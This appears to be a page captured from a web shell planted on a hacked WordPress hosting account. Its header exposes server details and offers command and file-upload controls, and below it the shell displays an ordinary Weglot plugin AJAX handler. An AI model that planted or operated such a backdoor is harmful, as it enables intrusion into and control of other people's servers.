|
Server IP : 10.131.40.8 / Your IP : 216.73.216.37 Web Server : Apache System : Linux webd008.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : ludmqhh ( 137773) PHP Version : 8.4.10 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/ludmqhh/www/hotel-forum/wp-content/_plugins/weglot/src/actions/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
namespace WeglotWP\Actions\Admin;
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
use WeglotWP\Models\Hooks_Interface_Weglot;
use WeglotWP\Services\User_Api_Service_Weglot;
class Ajax_User_Info implements Hooks_Interface_Weglot {
/**
* @var User_Api_Service_Weglot
*/
private $user_services;
public function __construct() {
$this->user_services = weglot_get_service( 'User_Api_Service_Weglot' );
}
/**
* @see Hooks_Interface_Weglot
*
* @since 3.0.0
* @return void
*/
public function hooks() {
if ( ! is_admin() ) {
return;
}
add_action( 'wp_ajax_get_user_info', array( $this, 'get_user_info' ) );
}
/**
* @since 3.0.0
* @return void
*/
public function get_user_info() {
if ( ! isset( $_POST['api_key'] ) ) { //phpcs:ignore
wp_send_json_error();
}
$api_key = sanitize_title( $_POST['api_key'] ); //phpcs:ignore
$response = $this->user_services->get_user_info( $api_key );
if ( array_key_exists( 'not_exist', $response ) && ! $response['not_exist'] ) {
wp_send_json_error();
}
wp_send_json_success( $response );
}
}
